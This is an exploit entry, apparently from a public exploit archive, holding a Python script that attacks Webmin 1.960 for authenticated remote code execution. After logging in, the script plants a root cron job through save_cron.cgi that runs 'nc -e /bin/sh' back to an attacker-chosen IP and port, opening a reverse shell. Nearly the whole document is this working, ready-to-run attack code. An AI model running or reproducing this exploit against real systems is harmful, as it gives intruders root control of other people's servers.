# Exploit Title: Webmin 1.960 - Remote Code Execution (Authenticated)
# Date: 2020-10-23
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.webmin.com
# Software Link: https://netix.dl.sourceforge.net/project/webadmin/webmin/1.960/webmin_1.960_all.deb
# Version: 1.960
# Tested on: Kali Linux & Ubuntu 18.04.5
# CVE: N/A

-—— Exploit ——-

#!/usr/bin/python3

import requests
import sys
import warnings
from bs4 import BeautifulSoup
import json
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) #added
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) < 6:
    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
custom_header = {"Referer": url + "/cron/edit_cron.cgi?new=1&search=&xnavigation=1",
		 "X-Progressive-URL": url + "/cron/save_cron.cgi",
		 "X-Requested-From-Tab": "webmin",
		 "X-Requested-From":"cron",
		 "X-Requested-With":"XMLHttpRequest"}

req = requests.session()
login_creds = {
    "user":username,
    "pass":password,
	}
      
get_cookie = req.get(url,verify=False)
cookies = get_cookie.cookies

print("[+] Sendin login request...")
login = req.post(url + "/session_login.cgi", login_creds, verify = False,cookies = cookies)


if "Warning!" not in login.text:


    payload = "/cron/save_cron.cgi?new=1&idx=&search=&user=root&active=1&cmd=nc%20-e%20%2Fbin%2Fsh%20" + ip + "%20" + port + "&input=&comment=&special=hourly&special_def=0&all_mins=1&all_hours=1&all_days=1&all_months=1&all_weekdays=1&range_def=1&range_start_day=&range_start_month=1&range_start_year=&range_end_day=&range_end_month=1&range_end_year=&undefined="
    page = url + payload
    req2 = req.get(page,verify = False,cookies=login.cookies,headers=custom_header)
    print("[+] Sending payload...")
    print("[+] Check your listener !...")

else:
    print("[-] Wrong credentials or may the system patched.")
    exit()